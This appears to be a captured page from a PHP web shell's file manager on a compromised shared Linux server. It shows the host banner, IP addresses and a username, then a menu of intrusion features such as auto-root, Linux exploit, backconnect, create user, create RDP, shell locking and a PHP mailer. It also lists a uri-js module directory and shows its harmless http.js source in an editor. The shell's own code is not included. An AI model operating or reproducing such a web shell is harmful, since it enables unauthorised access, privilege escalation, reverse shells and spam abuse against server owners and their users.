Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
uri-js /
dist /
esnext /
schemes /
[ HOME SHELL ]
Name
Size
Permission
Action
http.d.ts
108
B
-rw-r--r--
http.js
959
B
-rw-r--r--
http.js.map
841
B
-rw-r--r--
https.d.ts
108
B
-rw-r--r--
https.js
212
B
-rw-r--r--
https.js.map
312
B
-rw-r--r--
mailto.d.ts
359
B
-rw-r--r--
mailto.js
7.56
KB
-rw-r--r--
mailto.js.map
7.05
KB
-rw-r--r--
urn-uuid.d.ts
279
B
-rw-r--r--
urn-uuid.js
868
B
-rw-r--r--
urn-uuid.js.map
832
B
-rw-r--r--
urn.d.ts
324
B
-rw-r--r--
urn.js
2
KB
-rw-r--r--
urn.js.map
1.89
KB
-rw-r--r--
ws.d.ts
228
B
-rw-r--r--
ws.js
1.62
KB
-rw-r--r--
ws.js.map
1.58
KB
-rw-r--r--
wss.d.ts
108
B
-rw-r--r--
wss.js
198
B
-rw-r--r--
wss.js.map
307
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : http.js
const handler = { scheme: "http", domainHost: true, parse: function (components, options) { //report missing host if (!components.host) { components.error = components.error || "HTTP URIs must have a host."; } return components; }, serialize: function (components, options) { const secure = String(components.scheme).toLowerCase() === "https"; //normalize the default port if (components.port === (secure ? 443 : 80) || components.port === "") { components.port = undefined; } //normalize the empty path if (!components.path) { components.path = "/"; } //NOTE: We do not parse query strings for HTTP URIs //as WWW Form Url Encoded query strings are part of the HTML4+ spec, //and not the HTTP spec. return components; } }; export default handler; //# sourceMappingURL=http.js.map
Close